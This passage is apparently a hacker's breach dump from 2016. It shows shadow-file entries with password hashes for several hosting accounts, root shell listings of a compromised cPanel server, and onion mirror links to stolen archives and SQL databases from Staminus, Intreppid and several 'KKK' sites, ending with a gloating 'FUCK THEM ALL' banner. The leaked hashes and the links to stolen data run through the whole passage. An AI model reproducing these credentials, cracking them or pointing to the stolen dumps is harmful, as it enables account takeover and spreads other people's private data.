    cpanelconnecttrack:!!:16763::::::
    cpses:!!:16763::::::
    kkkcom:$6$h.XE7tATzeTEXTc2$0bgqXG1ZfqXp6bUnZSQO6dw57DpbrXZi7.AqjXyJFeg4QZ1gQ4JlxROLVCGwq7tMg6QsTBt075C.4PhYUgHDi/:16763:0:99999:7:::
    sotctrai:$1$UDsXv17a$vlI/hMvWvrd7loTGydbYm1:16763:0:99999:7:::
    sotctvc:$6$.qQotTxu6nz8aGbW$bEwWcWyhyIsa8DqV8Q8E/sclXvZuyfcx4p1uvBGiDcl.os62z/B3/GKGurlKtJfOvwCMzucrSFC/Bo7kjHp3Y1:16763:0:99999:7:::
    kkkpen6:$1$USWrdUqZ$eBdcbfgLQy9o0s.EKxDER.:16763:0:99999:7:::
    american:$1$T91QSPab$CPlzITFSlr0VjTO9jsGln1:16764:0:99999:7:::
    kkkradio:$6$EWmjNAwjV0OTxLzQ$JwPMYH8JPJhoZZZbfmVxCBM4EEJ7r7uIJrArvVR6Rx5lvx.SmAdYMy82G4DGUJCDbwIqxoXs7e48qS8n9X5D10:16764:0:99999:7:::
    wpmedia:$1$fyze3CAj$2KjG60YDb2qf6feDdHMYN1:16764:0:99999:7:::
    harrisonarkansas:$6$DUoFnQgxKEjN/2w6$.k/el.mCl6FPaf4ics4lB4.cOqcgEXHhWsjf4spSS4w1K2XkbFJqLUPYuwlQ73yJHGovv6vIJJVSX5.hP6S7r1:16788:0:99999:7:::
    clamav:!!:16830:0:99999:7:::
    whiteradio:$6$UlVWUbs.bJwQ3fV6$h/8Sq7426Kn9trOXAPCmn/Jj9hdfArXBdLRVoCK2YH7gB4BbLaPRoWc.5.ZV08SpGVhbmYTb2H2rI2CS/fNAO0:16851:0:99999:7:::
  root@sv1 [~]# ls -la
    total 312
    dr-xr-x---. 19 root root  4096 Feb 25 01:35 ./
    drwxr-xr-x. 25 root root  4096 Feb  8 10:40 ../
    -rw-------.  1 root root   990 Feb 19 20:43 .accesshash
    -rw-------.  1 root root  1679 Nov 23 23:10 anaconda-ks.cfg
    -rw-------.  1 root root 15098 Feb 24 20:14 .bash_history
    -rw-------.  1 root root  3015 Jan 27 14:01 .bash_history.cpanel_ticket.7446277
    -rw-r--r--.  1 root root    18 May 20  2009 .bash_logout
    -rw-r--r--.  1 root root   176 May 20  2009 .bash_profile
    -rw-r--r--.  1 root root   176 Sep 22  2004 .bashrc
    -rw-------.  1 root root 45056 Jan 27 03:14 .bwusage.sqlite
    drwx------.  5 root root  4096 Jan 30 11:00 .cpanel/
    drwxr-xr-x.  4 root root  4096 Nov 24 13:54 cpanel3-skel/
    drwxr-xr-x.  3 root root  4096 Nov 24 02:34 .cpanm/
    drwx------.  4 root root  4096 Nov 24 02:47 .cpobjcache/
    -rw-r--r--.  1 root root   100 Sep 22  2004 .cshrc
    drwxr-xr-x.  2 root root  4096 Feb 24 14:59 .data/
    -rw-------.  1 root root    24 Nov 24 13:48 .forward
    drwx------.  2 root root  4096 Nov 24 02:35 .gnupg/
    drwx------.  2 root root  4096 Jan 27 14:30 .HttpRequest/
    -rw-r--r--.  1 root root    10 Nov 24 02:31 installer.lock
    -rw-r--r--.  1 root root 26505 Nov 23 23:10 install.log
    -rw-r--r--.  1 root root  7572 Nov 23 23:08 install.log.syslog
    drwx------.  2 root root  4096 Nov 25 06:51 .libnet-openssh-perl/
    drwx------.  6 root root  4096 Jan 27 14:30 .MirrorSearch/
    -rw-------.  1 root root    48 Nov 24 02:33 .my.cnf
    drwxr-xr-x.  4 root root  4096 Dec  2 04:23 perl5/
    -rw-r--r--.  1 root root 38475 Nov 24 18:58 php.ini.new
    -rw-r--r--.  1 root root 38475 Nov 24 18:58 php.ini.orig
    drwxr-----.  3 root root  4096 Jan 27 13:15 .pki/
    drwxr-xr-x.  2 root root  4096 Nov 24 03:42 public_ftp/
    drwxr-xr-x.  3 root root  4096 Nov 24 03:42 public_html/
    drwxr-xr-x.  2 root root  4096 Feb 23 02:20 .razor/
    -rw-------.  1 root root  1024 Feb  8 08:45 .rnd
    drwx------.  3 root root  4096 Nov 24 02:25 .spamassassin/
    drwx------.  2 root root  4096 Feb 24 15:14 .ssh/
    -rw-r--r--.  1 root root   129 Dec  3  2004 .tcshrc
    drwxr-xr-x.  3 root root  4096 Feb 23 02:19 tmp/
    -rw-------.  1 root root  2030 Nov 24 02:04 .viminfo
  root@sv1 [~]# ls -la /home/
    total 132
    drwx--x--x. 20 root             root              4096 Feb 24 15:01 ./
    drwxr-xr-x. 25 root             root              4096 Feb  8 10:40 ../
    -rw-r--r--.  1 root             root               529 Nov 24 02:48 0_README_BEFORE_DELETING_VIRTFS
    drwx--x--x. 21 american         american          4096 Jan 27 04:32 american/
    drwx--x--x.  2 clamav           clamav            4096 Jan 30 11:02 clamav/
    drwxr-xr-x.  5 root             root              4096 Nov 24 14:38 .cpan/
    drwxr-xr-x.  2 root             root              4096 Nov 24 02:55 cPanelInstall/
    drwxr-xr-x.  3 root             root              4096 Nov 24 18:55 .cpanm/
    drwx------.  3 root             root              4096 Feb 23 02:20 .cpcpan/
    drwx------.  3 root             root              4096 Nov 24 02:36 cpeasyapache/
    drwxr-xr-x.  2 root             root              4096 Feb 24 17:23 .data/
    drwx--x--x. 11 harrisonarkansas harrisonarkansas  4096 Dec 18 21:11 harrisonarkansas/
    drwx--x--x. 14 kkkcom           kkkcom            4096 Jan 27 04:32 kkkcom/
    drwx--x--x. 19 kkkpen6          kkkpen6           4096 Jan 27 04:32 kkkpen6/
    drwx--x--x. 17 kkkradio         kkkradio          4096 Nov 25 14:14 kkkradio/
    -rw-r--r--.  1 root             root             25138 Nov  4 13:24 latest
    drwx------.  2 root             root             16384 Nov 23 22:58 lost+found/
    -rw-------.  1 root             root              7168 Feb 25 01:34 quota.user
    drwx--x--x. 17 sotctrai         sotctrai          4096 Jan 27 04:32 sotctrai/
    drwx--x--x. 16 sotctvc          sotctvc           4096 Jan 27 04:32 sotctvc/
    drwx--x--x.  3 root             root              4096 Nov 24 02:48 virtfs/
    drwx--x--x. 12 whiteradio       whiteradio        4096 Feb 19 20:44 whiteradio/
    drwx--x--x. 25 wpmedia          wpmedia           4096 Jan 27 04:32 wpmedia/
  root@sv1 [~/.razor]# cd /home/kkkcom
  root@sv1 [/home/kkkcom]# ls -la
    total 80
    drwx--x--x. 14 kkkcom kkkcom 4096 Jan 27 04:32 ./
    drwx--x--x. 20 root   root   4096 Feb 24 15:01 ../
    lrwxrwxrwx.  1 kkkcom kkkcom   32 Nov 27  2014 access-logs -> /usr/local/apache/domlogs/kkkcom/
    -rw-r--r--.  1 kkkcom kkkcom   18 Oct 16  2014 .bash_logout
    -rw-r--r--.  1 kkkcom kkkcom  176 Oct 16  2014 .bash_profile
    -rw-r--r--.  1 kkkcom kkkcom  124 Oct 16  2014 .bashrc
    drwxr-xr-x.  2 kkkcom kkkcom 4096 Oct 19 03:08 cache/
    -rw-------.  1 kkkcom kkkcom   28 Jan  1  2015 .contactemail
    drwxr-xr-x.  2 kkkcom kkkcom 4096 Feb 23 02:20 .cpanel/
    -rw-r-----.  1 kkkcom kkkcom    1 Apr 25  2015 cpbackup-exclude.conf
    drwx------.  4 kkkcom kkkcom 4096 Nov 24 14:12 .cphorde/
    drwxr-x---.  2 kkkcom mail   4096 Nov 27  2014 etc/
    drwxr-x---.  2 kkkcom nobody 4096 Nov 27  2014 .htpasswds/
    drwx------.  2 kkkcom kkkcom 4096 Feb 14 06:18 logs/
    drwxr-x--x.  8 kkkcom kkkcom 4096 Nov 27  2014 mail/
    drwxr-x---.  3 kkkcom kkkcom 4096 Nov 27  2014 public_ftp/
    drwxr-x---.  4 kkkcom nobody 4096 Nov 28  2014 public_html/
    drwxr-xr-x.  5 kkkcom kkkcom 4096 Oct 20 03:01 ssl/
    drwxr-xr-x.  7 kkkcom kkkcom 4096 Nov 27  2014 tmp/
    drwxr-xr-x.  3 kkkcom kkkcom 4096 Jan 27 04:32 var/
    lrwxrwxrwx.  1 kkkcom kkkcom   11 Nov 27  2014 www -> public_html/
    -rw-r--r--.  1 kkkcom kkkcom  658 Nov 10 06:27 .zshrc

    
  ~[CTRL-Z]~ EOF & Mirrors
  
    Staminus
    
        FILES:
            http://emqyrhqhxwbetyjb.onion/chatbot.tar.gz
            http://emqyrhqhxwbetyjb.onion/lighttpd.tar.gz
            http://emqyrhqhxwbetyjb.onion/main.tar.gz
            http://emqyrhqhxwbetyjb.onion/openvpn.tar.gz
            http://emqyrhqhxwbetyjb.onion/svn.tar.gz
            
        SQL:
            http://emqyrhqhxwbetyjb.onion/3-9-staminus2.sql
            http://emqyrhqhxwbetyjb.onion/accountUpdate.sql
            http://emqyrhqhxwbetyjb.onion/acctserver.sql
            http://emqyrhqhxwbetyjb.onion/appliance_lan.sql
            http://emqyrhqhxwbetyjb.onion/full.sql
            http://emqyrhqhxwbetyjb.onion/ip_limit_history.sql
            http://emqyrhqhxwbetyjb.onion/ip_limit_profile.sql
            http://emqyrhqhxwbetyjb.onion/ip_limit.sql
            http://emqyrhqhxwbetyjb.onion/sp.sql
    
    Intreppid
    
        FILES:
            http://emqyrhqhxwbetyjb.onion/www2.tar.gz
        SQL:
            http://emqyrhqhxwbetyjb.onion/fucked.dump
    
    KKK + Friends
    
        FILES:
            http://emqyrhqhxwbetyjb.onion/american.tar.gz
            http://emqyrhqhxwbetyjb.onion/harrisonarkansas.tar.gz
            http://emqyrhqhxwbetyjb.onion/kkkcom.tar.gz
            http://emqyrhqhxwbetyjb.onion/kkkpen6.tar.gz
            http://emqyrhqhxwbetyjb.onion/kkkradio.tar.gz
                                                    ____
                                         v        _(    )
        _ ^ _                          v         (___(__)
       '_\V/ `
       ' oX`
          X                            v
          X             ~EOF~
          X                                                 .
          X        \O/          -UNTIL NEXT TIME-           |\
          X.a##a.   M                                       |_\
       .aa########a.>>                                    __|__
    .a################aa.                                 \FTA/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                        FUCK THEM ALL - 2016
 
Источник
www.exploit-db.com

Похожие темы